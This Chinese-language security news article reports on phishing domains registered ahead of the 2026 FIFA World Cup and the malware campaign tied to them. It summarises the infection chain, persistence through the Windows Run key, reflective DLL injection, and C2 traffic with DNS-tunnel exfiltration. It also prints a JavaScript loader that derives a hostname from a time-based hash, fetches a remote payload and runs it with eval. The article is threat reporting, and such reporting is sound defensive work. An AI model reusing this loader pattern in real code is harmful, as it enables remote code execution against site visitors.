黑客注册域名，针对 2026 年 FIFA 世界杯发起网络攻击

安全研究人员发现，近几个月来域名注册量出现了前所未有的激增，这与即将到来的 2026 年 FIFA 世界杯密切相关。

这些域名通常伪装成合法的售票门户、商品销售点或直播平台，是多方面网络攻击活动的前兆，旨在收集凭证、传播恶意软件和窃取财务数据。

攻击者利用该活动的高知名度，提前最多十八个月注册欺骗性域名，以避免被发现并在毫无戒心的粉丝中建立信誉。

随着人们对比赛日程和门票供应情况的兴趣达到顶峰，访问者被引诱与这些欺诈网站进行互动，在不知不觉中启动了感染链。

BeforeAI 分析师发现了超过 498 个可疑域名，其中包含“fifa”、“worldcup”和主办城市名称等术语，注册数量在 2025 年 8 月达到峰值。

这些域名分布在包括 GoDaddy.com 和 Namecheap 在内的顶级注册商以及 .online 和 .shop 等低摩擦 TLD 中。

在许多情况下，威胁行为者会重新利用以前为其他体育赛事注册的旧域名，这进一步增加了归因和删除工作的复杂性。

注册与 2030 年和 2034 年未来锦标赛相关的域名凸显了这些网络犯罪集团所采用的长期战略。

此类准备活动的影响远不止简单的网络钓鱼攻击。受害者在这些网站上输入个人信息后，可能会被重定向到托管木马植入程序的有效载荷投递服务器，而这些植入程序能够规避基于签名的检测。

初步侦察表明，该恶意软件利用多态加载器在每次执行时修改其解密例程，从而阻止静态分析。

命令和控制 (C2) 通信通过 HTTPS 进行，与合法流量混合，而后备 DNS 隧道允许数据泄露，即使主通道中断。

感染机制和持久策略

深入研究感染机制可以发现，感染过程是一个分阶段的过程，首先将恶意 JavaScript 注入受感染的登录页面。

当毫无戒心的用户访问类似 的 URL 时watchfootball-live.com，该脚本会检查浏览器环境，并仅在满足特定条件（例如运行过时的浏览器插件）时才会投递第二阶段有效载荷。这种选择性投递方式可以减少受到沙盒分析的风险。

以下代码片段演示了脚本如何计算基于时间的哈希值来检索有效载荷 URL：

(function() {
    const key = "WorldCup2026";
    const now = Math.floor(Date.now() / 3600000);
    const hash = btoa(unescape(encodeURIComponent(key + now))).substr(0, 16);
    fetch(`https://${hash}.cdn-delivery.net/payload.js`)
        .then(response => response. Text())
        .then(eval);
})();

一旦执行，有效载荷就会将一个小型加载器写入 Windows 注册表以HKCU\Software\Microsoft\Windows\CurrentVersion\Run实现持久性。

然后，它会下载伪装成无害图像文件的其他模块，这些模块实际上是在内存中解压的加密可执行文件，并注入到合法进程中，例如svchost.exe。

通过采用反射式 DLL 注入，恶意软件避免将组件放入磁盘，从而显著减少取证足迹。

随着世界为 2026 年 FIFA 世界杯做准备，老旧域名的复杂使用，加上多态和内存技术，凸显了不断演变的威胁形势。

持续监控和主动域名黑名单对于保护粉丝和组织免受这场迫在眉睫的网络攻击至关重要。